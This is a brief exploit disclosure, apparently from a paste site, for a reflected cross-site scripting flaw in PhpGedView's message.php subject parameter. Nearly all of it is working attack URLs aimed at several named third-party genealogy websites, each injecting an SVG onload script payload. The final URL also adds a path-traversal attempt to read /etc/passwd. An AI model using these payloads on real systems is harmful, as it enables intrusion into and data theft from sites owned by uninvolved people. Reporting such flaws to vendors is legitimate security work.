PhpGedView Reflected-XSS                                    |
------------------------------------------------------------|
PHP Application - Online genealogy at its best              |
Vulnerability Point: [message.php?to=1&Subject=<here>]      |
------------------------------------------------------------|
                      Examples                              |
------------------------------------------------------------|
http://www.decock-marchand.be/stamboom/message.php?to=1&method=messaging2&url=individual.php%3Fpid%3DI1531%26amp%3Bged%3Dpdc210314-cn.ged&subject=%22%3E%3Csvg/onload=alert(/XSS/)%3E&PHPSESSID=1
http://www.bbgenealogy.net/utz/message.php?to=Admin&method=messaging2&url=individual.php%3Fpid%3DI1575%26amp%3Bged%3DUTZ.GED&subject=%22%3E%3Csvg/onload=alert(/XSS/)%3E&PHPSESSID=1
http://fardo.net/gedcom/message.php?to=jason&method=messaging2&url=famlist.php%3Falpha%3DH&subject=%22%3E%3Csvg/onload=alert(/XSS/)%3E&PHPSESSID=1
http://tree.fergusonfamilytree.info/message.php?to=malferguson&method=messaging2&url=compact.php%3Frootid%3DI4093%26amp%3Bged%3Dferguson.ged&subject=%22%3E%3Csvg/onload=alert(/XSS/)%3E&PHPSESSID=1
http://tree.fergusonfamilytree.info/message.php?to=malferguson&method=messaging2&url=compact.php%3Frootid%3DI4093%26amp%3Bged%3Dferguson.ged&subject=%22%3E%3Csvg/onload=alert(/XSS/)%3E&PHPSESSID=1
http://tree.fergusonfamilytree.info/message.php?to=malferguson&method=messaging2&url=../../etc/passwd%3Frootid%3DI4093%26amp%3Bged%3Dferguson.ged&subject=%22%3E%3Csvg/onload=alert(/XSS/)%3E&PHPSESSID=1

# siph0n [2016-12-27]